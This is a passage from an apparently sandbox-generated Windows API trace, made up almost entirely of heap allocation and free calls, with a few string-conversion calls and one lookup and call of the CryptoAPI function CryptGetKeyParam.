RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0075.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0075.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.642] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0075.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0075.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0075.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0075.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0075.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0075.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0075.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0075.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0075.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0075.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0075.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0075.643] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0075.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0075.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0075.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0075.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0075.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0075.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0075.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0075.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0075.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0075.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0075.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0075.643] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0075.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0075.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0075.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0075.644] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0075.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0075.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0075.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0075.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0075.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0075.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0075.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0075.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0075.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0075.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0075.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0075.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0075.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0075.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0075.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0075.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0075.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0075.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0075.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0075.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0075.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0075.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0075.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0075.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0075.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0075.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0075.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0075.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0075.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0075.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0075.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0075.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0075.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0075.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0075.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0075.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0075.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0075.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0075.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0075.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0075.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0075.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0075.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0075.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0075.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0075.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0075.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0075.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0075.647] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0075.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0075.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0075.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0075.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0075.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0075.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0075.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0075.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0075.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0075.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0075.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0075.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0075.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0075.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0075.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0075.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0075.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0075.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0075.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0075.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0075.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0075.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0075.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0075.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0075.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0075.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0075.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0075.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0075.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0075.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0075.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0075.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0075.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0075.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0075.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0075.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0075.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0075.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0075.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0075.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0075.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0075.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0075.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0075.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0075.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0075.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0075.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0075.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0075.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796ee8 [0075.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ee8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0075.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0075.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0075.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0075.657] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0075.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0075.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0075.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0075.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0075.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0075.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0075.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0075.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0075.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0075.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0075.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0075.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0075.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0075.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0075.657] CryptGetKeyParam (in: hKey=0x41ac780, dwParam=0x7, pbData=0x43e2530, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2530*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0075.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0075.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0075.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0075.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0075.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0075.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0075.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0075.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0075.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0075.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0075.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0075.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0075.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0075.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0075.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0075.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0075.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0075.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0075.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0075.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0075.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0075.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0075.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0075.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0075.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0075.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0075.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0075.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0075.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 